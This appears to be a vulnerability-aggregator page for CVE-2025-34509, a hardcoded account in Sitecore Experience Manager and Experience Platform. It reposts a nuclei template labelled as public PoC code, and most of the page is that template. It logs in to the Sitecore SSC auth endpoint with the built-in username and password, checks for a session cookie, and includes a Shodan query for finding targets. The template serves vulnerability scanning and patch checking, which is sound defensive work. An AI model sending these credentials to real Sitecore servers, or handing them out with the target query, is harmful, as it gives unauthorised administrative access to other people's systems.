CVE-2025-34509: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials

日期: 2025-08-01 | 影响软件: Sitecore Experience Manager (XM) and Experience Platform (XP) | POC: 已公开

漏洞描述

Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated and remote attackers can use this account to access administrative API over HTTP.

PoC代码[已公开]

id: CVE-2025-34509

info:
  name: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials
  author: daffainfo
  severity: high
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated and remote attackers can use this account to access administrative API over HTTP.
  reference:
    - https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34509
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-34509
    epss-score: 0.26732
    epss-percentile: 0.96131
    cwe-id: CWE-798
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*,cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_commerce,experience_platform
    shodan-query: title:"sitecore"
  tags: cve,cve2025,sitecore,experience_commerce,experience_platform,vkev

http:
  - raw:
      - |
        POST /sitecore/api/ssc/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"domain":"sitecore","username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - ServicesAPI
      password:
        - b

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie'
          - '.AspNet.Cookies='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d48b8e677ad0e774f2109a2bcf4a11dae02f30af2b19941ce604acd2330d6a69022100dc7a6cca473ad804e87b672fe0d62aa499d71857a75558a5872d4dcae1877684:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-34509.yaml